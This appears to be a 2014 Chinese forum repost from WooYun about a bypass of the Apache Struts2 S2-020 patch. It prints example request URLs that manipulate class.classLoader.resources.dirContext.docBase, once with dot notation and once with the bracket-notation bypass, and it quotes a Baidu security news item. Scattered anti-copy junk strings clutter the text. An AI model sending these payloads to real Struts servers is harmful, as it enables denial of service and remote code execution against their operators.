之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
7 h& M! A3 f& U# j! m V
; ]" x U/ E: o u- O+ g暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test; b+ e( p( H, O8 J+ U: A
' `9 `7 C+ |5 D! K1 s. D[color=rgb(51, 102, 153) !important]复制代码0 A2 N8 |& \( A
" x2 }. r4 V# X f- I
绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx
' y, L4 l& \; m9 a( {- o
6 h% @: e5 m6 H: o( X
[color=rgb(51, 102, 153) !important]复制代码/ V$ C: s: U1 B9 }. e9 S' N8 x
+ ?2 y: s! Q5 f+ Q5 O1 a, t) G! j
顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。 6 S) t! L# R2 c# i S
加速乐发了新闻:
$ Y$ C2 i# Q* q _http://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
2 ^- J' }' C- a) ]+ ~+ Z4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。 1 @' W) P) A! ^! N4 C2 V' k
3 ?5 j+ c& ]: p1 E/ O据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。8 _2 K) k/ {9 O F6 A6 F3 u3 O2 H
4 R" t8 T7 N- h2 A8 l
, h! N/ d* X9 _/ Y
I7 X$ V/ q) D5 v- ~" V5 i转载自乌云3 S ?, V4 K; Z* x5 r" E
原文链接:http://zone.wooyun.org/content/11876
. P7 ~2 D9 Y4 g) U. K+ y |
发表于 2014-4-27 19:10:10
收藏
支持
反对